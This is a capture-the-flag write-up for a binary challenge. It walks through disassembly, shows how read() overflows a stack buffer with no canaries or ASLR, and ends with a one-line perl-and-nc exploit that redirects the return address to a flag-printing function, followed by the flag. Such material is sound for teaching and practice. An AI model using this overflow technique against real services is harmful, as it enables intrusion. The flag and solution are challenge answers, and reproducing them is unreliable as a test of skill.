Sample Program Output:
What's your name?
Testing Name
It's dangerous to go alone! Take this, Testing Name
█
███
███
███
███
███
███
███
███
███
███████
█ ███ █
███
███
███
The program asks the user for a name, and then displays a message and a sword.
The message displayed is saved on the stack via manual movs:
401210: 48 b8 49 74 27 73 20 movabs rax,0x6e61642073277449
401217: 64 61 6e
40121a: 48 ba 67 65 72 6f 75 movabs rdx,0x742073756f726567
401221: 73 20 74
401224: 48 89 85 f0 fd ff ff mov QWORD PTR [rbp-0x210],rax
40122b: 48 89 95 f8 fd ff ff mov QWORD PTR [rbp-0x208],rdx
401232: 48 b8 6f 20 67 6f 20 movabs rax,0x6f6c61206f67206f
401239: 61 6c 6f
40123c: 48 ba 6e 65 21 20 54 movabs rdx,0x656b61542021656e
401243: 61 6b 65
401246: 48 89 85 00 fe ff ff mov QWORD PTR [rbp-0x200],rax
40124d: 48 89 95 08 fe ff ff mov QWORD PTR [rbp-0x1f8],rdx
401254: 48 b8 20 74 68 69 73 movabs rax,0x202c7369687420
40125b: 2c 20 00
40125e: ba 00 00 00 00 mov edx,0x0
401263: 48 89 85 10 fe ff ff mov QWORD PTR [rbp-0x1f0],rax
40126a: 48 89 95 18 fe ff ff mov QWORD PTR [rbp-0x1e8],rdx
And then tries to concatenate the user's name, asking for it via the read
function:
40129c: 48 8d 85 f0 fd ff ff lea rax,[rbp-0x210]
4012a3: 48 89 c7 mov rdi,rax
4012a6: e8 f5 fd ff ff call 4010a0 <strlen@plt>
4012ab: 48 8d 95 f0 fd ff ff lea rdx,[rbp-0x210]
4012b2: 48 01 d0 add rax,rdx
4012b5: ba 00 02 00 00 mov edx,0x200
4012ba: 48 89 c6 mov rsi,rax
4012bd: bf 00 00 00 00 mov edi,0x0
4012c2: e8 f9 fd ff ff call 4010c0 <read@plt>
The problem is that the read function will put the values at the end of where
the previous string ended up. This is rbp - 0x210 + strlen("It's dangerous...")
The read function reads up to 0x200 bytes, so we can write outside this
buffer and overwrite the return address.
There are no stack canaries nor ASLR, and right after the main function, there's
a function that opens a file named flag.txt and prints it out:
40130d: c3 ret
40130e: f3 0f 1e fa endbr64
401312: 55 push rbp
401313: 48 89 e5 mov rbp,rsp
401316: 48 81 ec 10 02 00 00 sub rsp,0x210
40131d: be 00 00 00 00 mov esi,0x0
401322: 48 8d 3d 16 0f 00 00 lea rdi,[rip+0xf16] # 40223f <open@plt+0x115f>
401329: b8 00 00 00 00 mov eax,0x0
40132e: e8 ad fd ff ff call 4010e0 <open@plt>
401333: 89 45 fc mov DWORD PTR [rbp-0x4],eax
401336: 48 8d 8d f0 fd ff ff lea rcx,[rbp-0x210]
40133d: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
401340: ba 00 02 00 00 mov edx,0x200
401345: 48 89 ce mov rsi,rcx
401348: 89 c7 mov edi,eax
40134a: e8 71 fd ff ff call 4010c0 <read@plt>
40134f: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
401352: 89 c7 mov edi,eax
401354: e8 57 fd ff ff call 4010b0 <close@plt>
401359: 48 8d 85 f0 fd ff ff lea rax,[rbp-0x210]
401360: 48 89 c7 mov rdi,rax
401363: e8 28 fd ff ff call 401090 <puts@plt>
401368: 90 nop
401369: c9 leave
40136a: c3 ret
So just changing the return address to 0x401313 works.
Solution: perl -e 'printf("a"x497 . "\x13\x13\x40" . "\x00"x10);' | nc jh2i.com 50011
flag{legend_of_zelda_overflow_of_time}
| Action | Rating | Author team |
|---|---|---|
| Read writeup |
not rated
|
Deadlock Team |
| Read writeup |
not rated
|
burner_herz0g |
| Read writeup |
2.0
|
Hack South |
